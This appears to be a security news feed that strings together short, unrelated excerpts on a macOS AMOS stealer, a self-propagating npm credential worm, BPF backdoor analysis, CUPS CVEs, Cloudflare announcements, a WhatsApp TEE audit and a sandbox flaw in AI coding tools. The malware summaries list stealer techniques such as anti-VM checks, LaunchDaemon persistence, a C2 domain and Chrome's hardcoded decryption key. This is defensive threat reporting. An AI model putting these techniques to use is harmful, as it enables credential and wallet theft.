Picked up a low-VT AMOS sample on March 12 worth flagging. Aligns with the recent malext variants but layers a few things we haven't seen combined before: * **Custom multi-stage decryption** (hex → ASCII → base64 via custom hash table) serving obfuscated osascript payloads at runtime — static analysis gets you almost nothing * **Anti-VM** via `system_profiler` checking for QEMU/VMware/KVM processor strings and known sandbox hardware serials, run twice before payload delivery * **Payload written to** `/bin/zsh` **child process iteratively via** `write()` **loop** — no plaintext payload on disk * **300+ crypto extension IDs** targeted + full desktop wallet scraping * **Hardware wallet trojanization** — silently replaces Ledger, Trezor, and Exodus with adhoc-signed phishing lookalikes that harvest passwords and seed phrases to `systellis[.]com` * **Three-layer persistence**: root LaunchDaemon (`com.finder.helper`) → `~/.mainhelper` backdoor pulled from C2 → `~/.agent` polling loop that pivots backdoor execution into the active console user's context every second via `stat -f "%Su" /dev/console`
Linux malware often hides in Berkeley Packet Filter (BPF) socket programs, which are small bits of executable logic that can be embedded in the Linux kernel to customize how it processes network traffic. Some of the most persistent threats on the Internet use these filters to remain dormant until they receive a specific "magic" packet. Because these filters can be hundreds of instructions long and involve complex logical jumps, reverse-engineering them by hand is a slow process that creates a bottleneck for security researchers. To find a better way, we looked at symbolic execution: a method of treating code as a series of constraints, rather than just instructions. By using the Z3 theorem prover, we can work backward from a malicious filter to automatically generate the packet required to trigger it. In this post, we explain how we built a tool to automate this, turning hours of manual assembly analysis into a task that takes just a few seconds. The complexity ceiling Before we look at how to deconstruct malicious filters, we need to understand the engine running them. The Berkeley Packet Filter (BPF) is a highly efficient technology that allows the kernel to pull specific packets from the network stack based on a set of bytecode instructions. While many modern developers are familiar with eBPF (Extended BPF), the powerful evolution used for observability and security, this post focuses on "classic" BPF. Originally designed for tools like tcpdump, classic BPF uses a simple virtual machine with just two registers to evaluate network traffic at high speeds. Because it runs deep within the kernel and can "hide" traffic from user-space tools, it has become a favorite tool for malware authors looking to build stealthy backdoors. Creating a contextual representation of BPF instructions
Reverse-engineered the Whoop 4.0 BLE protocol — CRC-32 with non-standard polynomial, 96-byte real-time data packets
[CVE-2026-34980](https://github.com/OpenPrinting/cups/security/advisories/GHSA-4852-v58g-6cwf) and [CVE-2026-34990](https://github.com/OpenPrinting/cups/security/advisories/GHSA-c54j-2vqw-wpwp)
In Telegram groups, men are sharing thousands of nonconsensual images of women and girls, buying spyware, and engaging in doxing and sexual abuse.
@fairwords npm packages compromised by a self-propagating credential worm - steals tokens, infects other packages you own, then crosses to PyPI
Three @`fairwords` scoped npm packages were hit today by what appears to be the TeamPCP/CanisterWorm campaign. The interesting part isn't just the credential theft, it's what it does with your npm token afterward. **What the postinstall payload does:** * Harvests environment variables matching 40+ patterns (AWS, GCP, Azure, GitHub, OpenAI, Stripe, etc.) * Reads SSH keys, `.npmrc`, `.kube/config`, Docker auth, Terraform credentials, `.git-credentials` * Steals crypto wallet data - Solana keypairs, Ethereum keystores, MetaMask LevelDB, Phantom, Exodus, Atomic Wallet * Decrypts Chrome saved passwords on Linux using the well-known hardcoded PBKDF2 key (`"peanuts"` / `"saltysalt"`) * Scans `/proc/[pid]/environ` for tokens in other running processes **Affected versions:** * `fairwords/websocket` 1.0.38 and 1.0.39 * `fairwords/loopback-connector-es` 1.4.3 and 1.4.4 * `fairwords/encryption` 0.0.5 and 0.0.6 If you have any of these installed, rotate npm tokens, cloud keys, SSH keys immediately and check whether any packages you maintain received unexpected version bumps. Full analysis with IOCs and payload walkthrough in the blog.
Tuesday, April 7
Cloudflare is accelerating its post-quantum roadmap. We now target 2029 to be fully post-quantum (PQ) secure including, crucially, post-quantum authentication. At Cloudflare, we believe in making the Internet private and secure by default. We started by offering free universal SSL certificates in 2014, began preparing our post-quantum migration in 2019, and enabled post-quantum encryption for all websites and APIs in 2022, mitigating harvest-now/decrypt-later attacks. While we’re excited by the fact that over 65% of human traffic to Cloudflare is post-quantum encrypted, our work is not done until authentication is also upgraded. Credible new research and rapid industry developments suggest that the deadline to migrate is much sooner than expected. This is a challenge that any organization must treat with urgency, which is why we’re expediting our own internal Q-Day readiness timeline. What happened? Last week, Google announced they had drastically improved upon the quantum algorithm to break elliptic curve cryptography, which is widely used to secure the Internet. They did not reveal the algorithm, but instead provided a zero-knowledge proof that they have one. This is not even the biggest breakthrough. That same day, Oratomic published a resource estimate for breaking RSA-2048 and P-256 on a neutral atom computer. For P-256, it only requires a shockingly low 10,000 qubits. Google’s motivatio
As Trump threatens Iranian infrastructure, the US government warns that Iran has carried out its own digital attacks against US critical infrastructure.
AI coding tools are being shipped fast. In too many cases, basic security is not keeping up. In our latest research, we found the same sandbox trust-boundary failure pattern across tools from Anthropic, Google, and OpenAI. Anthropic fixed and engaged quickly (CVE-2026-25725). Google did not ship a fix by disclosure. OpenAI closed the report as informational and did not address the core architectural issue. That gap in response says a lot about vendor security posture.
The AI lab's Project Glasswing will bring together Apple, Google, and more than 45 other organizations. They'll use the new Claude Mythos Preview model to test advancing AI cybersecurity capabilities.
WhatsApp’s new “Private Inference” feature represents one of the most ambitious attempts to combine end-to-end encryption with AI-powered capabilities, such as message summarization. To make this possible, Meta built a system that processes encrypted user messages inside trusted execution environments (TEEs), secure hardware enclaves designed so that not even Meta can access the plaintext. Our now-public audit , conducted before launch, identified several vulnerabilities that compromised WhatsApp’s privacy model, all of which Meta has patched. Our findings show that TEEs aren’t a silver bullet: every unmeasured input and missing validation can become a vulnerability, and to securely deploy TEEs, developers need to measure critical data, validate and never trust any unmeasured data, and test thoroughly to detect when components misbehave. The challenge of using AI with end-to-end encryption WhatsApp’s Private Processing attempts to resolve a fundamental tension: WhatsApp is end-to-end encrypted, so Meta’s servers cannot read, alter, or analyze user messages. However, if users also want to opt in to AI-powered features like message summarization, this typically requires sending plaintext data to servers for computationally expensive processing. To solve this, Meta uses TEEs based on AMD’s SEV-SNP and Nvidia’s confidential GPU platforms to process messages in a secure enclave where even Meta can’t access them or learn meaningful information about the message contents. The stakes in WhatsApp are high, as vulnerabilities could expose millions of users’ private messages. Our review identified 28 issues, including eight high-severity findings that could h
In Brief The Question Every Board Is Asking Cybersecurity environments grow more complex every year. Cloud infrastructure expands daily. New applications appear. APIs multiply. Attackers increasingly use automation and purpose-built AI tools—including offensive tools like GhostGPT—to identify weaknesses faster than security teams can remediate them. At RSA 2026, the recurring theme across the keynote stages […] The post Continuous Security Validation: Why It Matters and Why Synack Is Built for It appeared first on Synack .
Common Entra ID Security Assessment Findings – Part 3: Weak Privileged Identity Management Configuration
This post is part of a small blog series covering common Entra ID security findings observed during real-world assessments. Each article explores selected findings in more detail to provide a clearer understanding of the underlying risks and practical implications. Part 1: Privileged Foreign Enterprise Applications Part 2: Privileged Unprotected Groups What Is Privileged Identity Management? Privileged Identity Management (PIM) is a service in Microsoft Entra ID that enables organizations to manage, control, and monitor privileged access. The main features are: Provide just-in-time privileged access Assign time-bound access and end dates Require approval or multifactor authentication to activate privileged roles Require written justification for role activation Generate notifications when privileged roles are activated A common use case is to avoid permanently assigning the Global Administrator role. Instead, users or group members are made eligible to activate the role only when needed and only for a limited period.
Presently sponsored by: Report URI: Guarding you from rogue JavaScript! Don’t get pwned; get real-time alerts & prevent breaches #SecureYourSite This week, more time than I'd have liked to spend went on talking about the trials of chasing invoices. This is off the back of a customer (who, for now, will remain unnamed), who had invoices stacking back more than 6 months overdue and despite payment terms of 30 days, paid on an average of 80 days . But as I say in this week's video, more than anything, it was the gall of the CEO to take issue with my frustrated tone rather than with their complete lack of respect for basic business etiquette and paying one's suppliers. And so, Copilot and I spent the weekend fixing up a nice little Xero integration to ensure this never happens again. If you arrive at this post sometime in the future after finding your HIBP enterprise service no longer functioning weeks after an unpaid invoice was due, at least you'll know it's not personal... and pay your damn bills!
We're launching C2 Detection — a new GreyNoise intelligence module that gives you two distinct, high-confidence signals that a device in your environment has been compromised.
Monday, April 6
Cloudflare was designed to be simple to use for even the smallest customers, but it’s also critical that it scales to meet the needs of the largest enterprises. While smaller customers might work solo or in a small team, enterprises often have thousands of users making use of Cloudflare’s developer, security, and networking capabilities. This scale can add complexity, as these users represent multiple teams and job functions. Enterprise customers often use multiple Cloudflare Accounts to segment their teams (allowing more autonomy and separation of roles), but this can cause a new set of problems for the administrators by fragmenting their controls. That’s why today, we’re launching our new Organizations feature in beta — to provide a cohesive place for administrators to manage users, configurations, and view analytics across many Cloudflare Accounts. Principle of least privilege The principle of least privilege is one of the driving factors behind enterprises using multiple accounts. While Cloudflare’s role-based access control (RBAC) system now offers fine-grained permissions for many resources, it can be cumbersome to enumerate all the resources one by one. Instead, we see enterprises use multiple accounts, so each team’s resources are managed by that team alone. This allows organic growth within the account: they can add new resources as needed, without giving Administrative control too widely. While multiple accounts are great at limiting permissions for most of the users within an organization, they complicate things for the administrators, as the administrators need to be added to every account and given the appropriate
Nonprofits run out of US Border Patrol stations are also selling other “operation”-themed coins that include a phrase popularized by the Proud Boys, potentially in violation of government rules.